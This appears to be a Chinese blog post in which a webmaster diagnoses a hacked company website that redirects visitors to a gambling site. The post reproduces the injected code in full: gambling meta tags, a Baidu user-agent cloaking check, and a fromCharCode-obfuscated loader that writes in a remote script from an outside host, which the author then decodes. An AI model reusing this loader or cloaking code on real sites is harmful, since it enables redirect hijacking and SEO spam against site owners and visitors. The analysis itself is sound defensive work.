网站打开偶尔会跳到其它的博彩网站,是被挂码了!!
今天在修改一个企业网站时,发现网站页面点击有一定的楖率会跳到一个博彩网站
仔细看一下代码,发现异常代码
<meta property="og:image" content="http://www.gd-foods.com/logo.png"/> <title>bet365皇冠彩票,皇冠网投bet365,皇冠bet365客服</title> <meta name="keywords" content="皇冠注投网最新网址,皇冠365注册,官网入口,皇冠365注册"/> <meta name="description" content="皇冠注投网最新网址欢迎你~!【www.196646.com】皇冠注投网最新网址拥有最丰富的游戏项目和庞大的游戏用户数,加入我们体验最佳真平台,不定期送出惊喜大礼包。"/> <meta property="og:image" content="http://www.gd-foods.com/logo.png"/> <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="东莞市xxxx有限公司"}</script> <script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>
可以看到有很多的 Unicode编码和 fromCharCode编码的内容代码
Unicode解码
看到是补值入一个博彩网站的内容
fromCharCode 解码
var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt);
输出的是一个js文件地址
<script src="https://efhfuh1.com/365.js"></script>
查看https://efhfuh1.com/365.js
存在页面跳转代码!!!
仔细查看,还有一个判断代码
if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="东莞市绿梦源食品科技有限公司"}
判断浏览器不是baidu,则网页title标签显示正常的内容